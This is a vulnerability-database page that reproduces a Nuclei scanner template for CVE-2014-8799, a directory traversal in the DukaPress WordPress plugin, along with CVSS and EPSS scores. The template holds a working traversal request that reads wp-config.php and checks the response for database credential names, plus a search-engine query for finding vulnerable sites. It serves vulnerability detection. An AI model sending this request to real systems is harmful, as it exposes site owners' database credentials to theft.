Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-8799
HistoryJul 27, 2021 - 10:03 p.m.

WordPress Plugin DukaPress 2.5.2 - Directory Traversal

2021-07-2722:03:23
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.5 Medium

AI Score

Confidence

Low

0.178 Low

EPSS

Percentile

96.2%

A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a … (dot dot) in the src parameter to lib/dp_image.php.

id: CVE-2014-8799

info:
  name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server.
  remediation: |
    Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
    - https://www.exploit-db.com/exploits/35346
    - https://wordpress.org/plugins/dukapress/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/98943
    - https://plugins.trac.wordpress.org/changeset/1024640/dukapress
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2014-8799
    cwe-id: CWE-22
    epss-score: 0.17844
    epss-percentile: 0.9615
    cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: dukapress
    product: dukapress
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/dukapress"
  tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_USER"
          - "DB_HOST"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022012ec28b7ae2fa5ce33f3b849a618ce6d294d4f289985e633959927d2448b8cad022100ece7f22daa65a7bd0eebb32142e90b3ce9f976cade0071f9690cdc7e62bac780:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.5 Medium

AI Score

Confidence

Low

0.178 Low

EPSS

Percentile

96.2%